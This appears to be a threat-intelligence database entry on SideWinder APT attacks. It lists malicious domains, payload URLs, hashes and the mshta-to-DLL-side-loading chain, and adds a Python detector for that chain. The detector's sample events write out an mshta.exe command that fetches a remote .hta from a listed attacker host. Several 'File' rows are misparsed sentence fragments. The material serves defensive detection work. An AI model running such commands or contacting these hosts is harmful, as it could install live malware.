Analysis of recent attack activity by the SideWinder (响尾蛇) APT group against neighbouring countries and regions
Tags
Common Information
Type Value
UUID bed1426f-1a9a-4c0d-8f5c-3bb96b3c72cb
Fingerprint fba047aeb6136b96
Analysis status DONE
Considered CTI value 2
Text language
Published May 20, 2020, midnight
Added to db Dec. 21, 2024, 2:16 a.m.
Last updated Dec. 21, 2024, 3:06 a.m.
Headline Analysis of recent attack activity by the SideWinder (响尾蛇) APT group against neighbouring countries and regions
Title Analysis of recent attack activity by the SideWinder (响尾蛇) APT group against neighbouring countries and regions
Detected Hints/Tags/Attributes 7/0/59
Source URLs
Attributes
Type     #Events  Value
Domain   3        classes.zip
Domain   25       test.zip
Domain   32       sandbox.ti.qianxin.com
Domain   6        reawk.net
Domain   6        ap-ms.net
Domain   3        www.link-cdnl.net
Domain   4        kat0x.net
Domain   5        cloud-apt.net
Domain   4        www.d01fa.net
Domain   2        www.nrots.net
Domain   3        www.fdn-en.net
Domain   8        it.rising.com.cn
Domain   6752     163.com
File     3        classes.zip
File     2        pak_army_deployed_in_country_in_fight_against_coronavirus.pdf
File     3        additional_csd_rebate.pdf
File     2        daraz-coupon.pdf
File     25       test.zip
File     2        lnk and pak_army_deployed_in_country_in_fight_against_coronavirus.pdf
File     2        after execution it proceeds via mshta.exe
File     2        the decoded and loaded DLL is named lnikzip.dll
File     2        if the download succeeds, it proceeds via mshta.exe
File     2        the decrypted and executed DLL is named stinstaller.dll
File     2        then copies rekeywiz.exe from the system directory
File     2        and is named duser.dll
File     2        then launches the rekeywiz.exe in the malware's directory
File     2        loads the malicious duser.dll by the white-plus-black technique (DLL side-loading: a legitimate signed binary loading a malicious DLL)
File     39       duser.dll
File     2        named systemapp.dll
File     2        the final malicious payload is also systemapp.dll
File     2        19658.html
md5      2        865e7c8013537414b97749e7a160a94e
md5      2        3c9f64763a24278a6f941e8807725369
md5      2        120e3733e167fcabdfd8194b3c49560b
md5      2        7442b3efecb909cfff4aea4ecaae98d8
md5      2        d7187130cf52199fae92d7611dc41dac
md5      2        bad0917fdb0963903747e86c33b74c08
md5      2        58363311f04f03c6e9ccd17b780d03b2
md5      2        fef12d62a3b2fbf1d3be1f0c71ae393e
md5      2        f6d29ca878f0815935fc1de2def06c46
md5      2        dbb09fd0da004742cac805150dbc01ca
md5      2        2c798c915568b3fd8ee7909c45a43168
md5      2        4476ee858c455a84031d3f54a0dfe73d
md5      2        affbb0cf97289220b88dee2961e0a4b3
md5      2        cf18974bb2f68e7d9d172d939a4ba313
md5      2        4dc475b2055b5a880cbd67526b0f6e3c
md5      2        265222bbe164d55750ca0ee1a53f2de2
md5      2        4e5deecb468ab36c5fe347a39878c949
Url      9        https://sandbox.ti.qianxin.com
Url      94       https://sandbox.ti.qianxin.com/sandbox/page
Url      2        http://www.au-edu.km01s.net/images/e2bc769a/16914/11662/84c7b244/3387c59,http://www.au-edu.km01s.net/cgi/8ee4d36866/16914/11662/eeef4361/file.hta
Url      2        https://kat0x.net/202/pqvzogpu3ormmdi7cyxmi9cwfgf2idgzkuiz2ybi/16914/11662/b0aad51f
Url      2        https://www.link-cdnl.net/202/cklcpzebtbrgqv4jbbk1at910xhhknvpnnfm4o10/-1/2369/ecc56eb4
Url      3        https://cloud-apt.net/202/h5lvzvpjay89njsklmam4psgoxdnzrgs0ybwrvt7/20/11248/371a005a
Url      3        http://www.d01fa.net/images/d817583e/16364/11542/f2976745/966029e
Url      2        http://www.nrots.net/images/5328c28b/15936/11348/7c8d64e9/e17e25e
Url      2        http://www.fdn-en.net/images/0b0d90ad/-1/2418/9ccd0068/9d68236
Url      2        https://ti.qianxin.com/blog/articles/coronavirus-analysis-of-global-outbreak-related-cyber-attacks
Url      2        http://it.rising.com.cn/dongtai/19658.html
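The attribute rows above outline the chain the report describes: an LNK runs mshta.exe against a remote .hta, the dropped stage copies the legitimate rekeywiz.exe out of the system directory next to a malicious duser.dll, and the copy side-loads that DLL. The following is an added detection example written for this entry; it is not code from the Qi'anxin report or from the CTI database. It takes the domains, the file.hta URL host and the MD5 list from this page as indicators and runs four checks over constructed Sysmon-style process-creation and image-load events. The event dictionary layout, the user-profile paths and the assignment of the first listed MD5 to the sample duser.dll are assumptions made for illustration; the page does not say which hash belongs to which file.

```python
"""Detection of the mshta -> rekeywiz.exe/duser.dll side-load chain listed above.
Added example; event format and sample events are constructed, not from the report."""
import re

# Domains from the attribute table plus the host of the file.hta URL on this page.
IOC_DOMAINS = {
    "reawk.net", "ap-ms.net", "www.link-cdnl.net", "kat0x.net", "cloud-apt.net",
    "www.d01fa.net", "www.nrots.net", "www.fdn-en.net", "www.au-edu.km01s.net",
}

# MD5 hashes from the attribute table (page gives no hash-to-file mapping).
IOC_MD5 = {
    "865e7c8013537414b97749e7a160a94e", "3c9f64763a24278a6f941e8807725369",
    "120e3733e167fcabdfd8194b3c49560b", "7442b3efecb909cfff4aea4ecaae98d8",
    "d7187130cf52199fae92d7611dc41dac", "bad0917fdb0963903747e86c33b74c08",
    "58363311f04f03c6e9ccd17b780d03b2", "fef12d62a3b2fbf1d3be1f0c71ae393e",
    "f6d29ca878f0815935fc1de2def06c46", "dbb09fd0da004742cac805150dbc01ca",
    "2c798c915568b3fd8ee7909c45a43168", "4476ee858c455a84031d3f54a0dfe73d",
    "affbb0cf97289220b88dee2961e0a4b3", "cf18974bb2f68e7d9d172d939a4ba313",
    "4dc475b2055b5a880cbd67526b0f6e3c", "265222bbe164d55750ca0ee1a53f2de2",
    "4e5deecb468ab36c5fe347a39878c949",
}

# Directories where rekeywiz.exe and duser.dll legitimately live (assumed default install).
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
URL_HOST = re.compile(r"https?://([^/\s'\"]+)", re.I)


def in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


# Constructed sample telemetry (assumed layout: "process" = process create,
# "imageload" = DLL load). The mshta URL is the file.hta URL listed on this page.
USER_DIR = r"C:\Users\victim\AppData\Roaming\Update"
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://www.au-edu.km01s.net/cgi/8ee4d36866/16914/11662/eeef4361/file.hta"},
    # rekeywiz.exe copied out of System32 and started from a user-writable directory.
    {"id": 2, "type": "process", "image": USER_DIR + "\\rekeywiz.exe", "cmdline": "rekeywiz.exe"},
    # The copy loads duser.dll from its own directory (side-load); hash assignment is illustrative.
    {"id": 3, "type": "imageload", "image": USER_DIR + "\\rekeywiz.exe",
     "loaded": USER_DIR + "\\duser.dll", "md5": "865e7c8013537414b97749e7a160a94e"},
    # Benign: the real rekeywiz.exe loading the real duser.dll from System32.
    {"id": 4, "type": "process", "image": r"C:\Windows\System32\rekeywiz.exe", "cmdline": "rekeywiz.exe"},
    {"id": 5, "type": "imageload", "image": r"C:\Windows\System32\rekeywiz.exe",
     "loaded": r"C:\Windows\System32\duser.dll", "md5": "00000000000000000000000000000000"},
    # Benign: mshta.exe on a local file, no remote URL.
    {"id": 6, "type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\setup.hta"},
]


def detect(events):
    """Return (rule, event id) pairs for events matching the chain described on this page."""
    alerts = []
    for ev in events:
        if ev["type"] == "process":
            image = basename(ev["image"])
            cmd = ev.get("cmdline", "")
            # mshta.exe pulling a remote HTA, as in the file.hta URL above.
            if image == "mshta.exe" and URL_HOST.search(cmd):
                alerts.append(("mshta_remote_hta", ev["id"]))
            # rekeywiz.exe running from anywhere but its system directory.
            if image == "rekeywiz.exe" and not in_system_dir(ev["image"]):
                alerts.append(("rekeywiz_outside_system_dir", ev["id"]))
            # Any command line that references a domain from this page.
            for host in URL_HOST.findall(cmd):
                if host.lower() in IOC_DOMAINS:
                    alerts.append(("ioc_domain:" + host.lower(), ev["id"]))
        elif ev["type"] == "imageload":
            # White-plus-black side-load: rekeywiz.exe loading a duser.dll that is not the system one.
            if (basename(ev["image"]) == "rekeywiz.exe"
                    and basename(ev["loaded"]) == "duser.dll"
                    and not in_system_dir(ev["loaded"])):
                alerts.append(("duser_dll_sideload", ev["id"]))
            # Loaded module hash matches a hash from this page.
            if ev.get("md5", "").lower() in IOC_MD5:
                alerts.append(("ioc_md5:" + ev["md5"].lower(), ev["id"]))
    return alerts


if __name__ == "__main__":
    for rule, event_id in detect(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

The path-based rules are the durable part: the domains and hashes on this page will rotate, but rekeywiz.exe executing outside its system directory, or loading a duser.dll from outside it, is unusual on a workstation regardless of which campaign is behind it. Pair the DLL-load rule with a signature check on the loaded module where your telemetry records one.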